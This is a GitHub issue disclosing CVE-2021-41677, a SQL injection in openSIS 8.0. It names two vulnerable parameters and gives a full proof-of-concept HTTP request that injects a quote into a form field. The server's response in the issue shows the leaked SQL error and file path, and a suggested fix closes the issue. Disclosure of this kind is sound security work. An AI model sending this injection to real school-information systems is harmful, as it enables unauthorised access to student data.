Headline
CVE-2021-41677: SQL injection in multiple functions · Issue #202 · OS4ED/openSIS-Classic
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php &Grade= parameter.
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/EditHistoryMarkingPeriods.php, values[new][MP_TYPE]= parameter.
POC:
REQUEST:
POST /Modules.php?modname=grades/EditHistoryMarkingPeriods.php&modfunc=update&tab_id=&mp_id= HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=eligibility/TeacherCompletion.php&LO_direction=1&portal_search=true&LO_search=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
values[new][MP_'TYPE]=year&values%5Bnew%5D%5BNAME%5D=q&month_values%5Bnew%5D%5BPOST_END_DATE%5D=09&day_values%5Bnew%5D%5BPOST_END_DATE%5D=01&year_values%5Bnew%5D%5BPOST_END_DATE%5D=2021&values%5Bnew%5D%5BSYEAR%5D=2008
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
<pre> DB Execute Failed </pre></TD>
</TR><TR>
<TD align=right><b>SQL:</b></TD>
<TD>INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, MP_'TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/modules/grades/EditHistoryMarkingPeriods.php at 92</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')' at line 1</TD>
</TR>
[…]
SOLUTION:
Use function sqlSecurityFilter() before foreach variable $_REQUEST['staff'].
`foreach (sqlSecurityFilter($_REQUEST['values']) as $id => $columns)`